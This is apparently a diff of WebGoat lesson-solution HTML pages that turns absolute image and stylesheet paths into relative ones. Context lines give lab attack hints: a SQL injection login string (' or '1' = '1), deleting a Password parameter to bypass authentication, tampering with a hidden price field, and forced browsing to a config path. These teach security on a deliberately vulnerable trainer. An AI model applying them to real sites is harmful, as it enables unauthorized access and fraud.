<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/DOS_Login_files/editdata.mso">
<link rel=File-List href="lesson_solutions/DOS_Login_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/DOS_Login_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/DOS_Login_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/DOS_Login_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/DOS_Login_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/DOS_Login_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -651,9 +651,9 @@ SQL Injection attack. Enter in the password field ' or '1' = '1<o:p></o:p></span
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_9" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOS_Login_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOS_Login_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOS_Login_files/image002.jpg" v:shapes="Picture_x0020_9"><![endif]></span></p>
src="lesson_solutions/DOS_Login_files/image002.jpg" v:shapes="Picture_x0020_9"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -673,9 +673,9 @@ password passwd1. And finally login with jplane and passwd3. <o:p></o:p></span><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_10"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOS_Login_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOS_Login_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOS_Login_files/image004.jpg" v:shapes="Picture_x0020_10"><![endif]></span></p>
src="lesson_solutions/DOS_Login_files/image004.jpg" v:shapes="Picture_x0020_10"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Dangerous Use of Eval</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Dangerous Use of Eval)</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Encoding Basics</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/editdata.mso">
<link rel=File-List href="lesson_solutions/FailOpenAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/FailOpenAuthentication_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/FailOpenAuthentication_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml">
href="lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -635,9 +635,9 @@ should be able to bypass the authentication check.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_3" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image009.jpg" v:shapes="Picture_x0020_3"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image009.jpg" v:shapes="Picture_x0020_3"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -661,9 +661,9 @@ name webgoat and click "Login". Intercept the request with WebScarab.<o:p></o:p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_7"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image010.jpg" v:shapes="Picture_x0020_7"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image010.jpg" v:shapes="Picture_x0020_7"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -683,9 +683,9 @@ variable "Password" and click "Delete". Click "Accept changes".<o:p></o:p></span
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_8"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image011.jpg" v:shapes="Picture_x0020_8"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image011.jpg" v:shapes="Picture_x0020_8"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -704,9 +704,9 @@ field-end'></span><![endif]--> Password variable is deleted</p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_4"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image012.jpg" v:shapes="Picture_x0020_4"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image012.jpg" v:shapes="Picture_x0020_4"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ForcedBrowsing_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ForcedBrowsing_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ForcedBrowsing_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ForcedBrowsing_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ForcedBrowsing_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/ForcedBrowsing_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/ForcedBrowsing_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -664,9 +664,9 @@ style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_97" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image002.jpg" v:shapes="Picture_x0020_97"><![endif]></span></p>
src="lesson_solutions/ForcedBrowsing_files/image002.jpg" v:shapes="Picture_x0020_97"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -692,8 +692,8 @@ what could be the servlet for config?<o:p></o:p></span></p>
mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
mso-bidi-font-weight:bold'>Try to access /WebGoat/config,
/WebGoat/configuration, /WebGoat/conf, ….<o:p></o:p></span></p>
mso-bidi-font-weight:bold'>Try to access config,
configuration, conf, ….<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></p>
@ -703,15 +703,15 @@ style='mso-bidi-font-weight:normal'><span style='font-family:"Arial","sans-serif
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_98" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image004.jpg" v:shapes="Picture_x0020_98"><![endif]></span></b></p>
src="lesson_solutions/ForcedBrowsing_files/image004.jpg" v:shapes="Picture_x0020_98"><![endif]></span></b></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
field-separator'></span><![endif]--><span style='mso-no-proof:yes'>2</span><!--[if supportFields]><span
style='mso-element:field-end'></span><![endif]--> No /WebGoat/config</p>
style='mso-element:field-end'></span><![endif]--> No config</p>
<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
@ -719,15 +719,15 @@ style='mso-element:field-end'></span><![endif]--> No /WebGoat/config</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_99"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image006.jpg" v:shapes="Picture_x0020_99"><![endif]></span></p>
src="lesson_solutions/ForcedBrowsing_files/image006.jpg" v:shapes="Picture_x0020_99"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
field-separator'></span><![endif]--><span style='mso-no-proof:yes'>3</span><!--[if supportFields]><span
style='mso-element:field-end'></span><![endif]--> No /WebGoat/configuration</p>
style='mso-element:field-end'></span><![endif]--> No configuration</p>
<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
@ -735,15 +735,15 @@ style='mso-element:field-end'></span><![endif]--> No /WebGoat/configuration</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_100"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image008.jpg" v:shapes="Picture_x0020_100"><![endif]></span></p>
src="lesson_solutions/ForcedBrowsing_files/image008.jpg" v:shapes="Picture_x0020_100"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
field-separator'></span><![endif]--><span style='mso-no-proof:yes'>4</span><!--[if supportFields]><span
style='mso-element:field-end'></span><![endif]--> Bingo for /WebGoat/conf</p>
style='mso-element:field-end'></span><![endif]--> Bingo for conf</p>
<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ForgotPassword_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ForgotPassword_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ForgotPassword_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ForgotPassword_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ForgotPassword_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ForgotPassword_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/ForgotPassword_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/ForgotPassword_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -651,9 +651,9 @@ else his password.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_477" o:spid="_x0000_i1031" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image015.jpg" v:shapes="Picture_x0020_477"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image015.jpg" v:shapes="Picture_x0020_477"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -673,9 +673,9 @@ you will get a password reminder, only not via e-mail.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_478"
o:spid="_x0000_i1030" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image016.jpg" v:shapes="Picture_x0020_478"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image016.jpg" v:shapes="Picture_x0020_478"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -690,9 +690,9 @@ field-end'></span><![endif]--> Submit the answer red<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_479"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image017.jpg" v:shapes="Picture_x0020_479"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image017.jpg" v:shapes="Picture_x0020_479"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -721,9 +721,9 @@ to guess the password for another user. The text tells you something about an
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_480"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image018.jpg" v:shapes="Picture_x0020_480"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image018.jpg" v:shapes="Picture_x0020_480"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -743,9 +743,9 @@ Now you need the guess some colors.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_481"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image019.jpg" v:shapes="Picture_x0020_481"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image019.jpg" v:shapes="Picture_x0020_481"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -767,9 +767,9 @@ and green for example.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_482"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image020.jpg" v:shapes="Picture_x0020_482"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image020.jpg" v:shapes="Picture_x0020_482"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -788,9 +788,9 @@ incorrect response.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_483"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image021.jpg" v:shapes="Picture_x0020_483"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image021.jpg" v:shapes="Picture_x0020_483"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HiddenFieldTampering_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HiddenFieldTampering_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/HiddenFieldTampering_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml">
href="lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -560,9 +560,9 @@ price.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_103" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image011.jpg" v:shapes="Picture_x0020_103"><![endif]></span></p>
src="lesson_solutions/HiddenFieldTampering_files/image011.jpg" v:shapes="Picture_x0020_103"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -590,9 +590,9 @@ must define proxy "localhost" with port 8008.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_104"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:4in;height:254.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=384 height=339
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image012.jpg" v:shapes="Picture_x0020_104"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image012.jpg" v:shapes="Picture_x0020_104"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -614,9 +614,9 @@ WebScarab <o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_105"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image013.jpg" v:shapes="Picture_x0020_105"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image013.jpg" v:shapes="Picture_x0020_105"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -634,9 +634,9 @@ style='font-family:"Arial","sans-serif"'> Intercept request with WebScarab<o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_106"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image014.jpg" v:shapes="Picture_x0020_106"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image014.jpg" v:shapes="Picture_x0020_106"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -653,9 +653,9 @@ style='font-family:"Arial","sans-serif"'> Change the Price variable to 1<o:p></o
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_107"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image015.jpg" v:shapes="Picture_x0020_107"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image015.jpg" v:shapes="Picture_x0020_107"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HtmlClues_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HtmlClues_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HtmlClues_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HtmlClues_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HtmlClues_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HtmlClues_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HtmlClues_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HtmlClues_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -557,9 +557,9 @@ should be able to bypass the authentication check.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
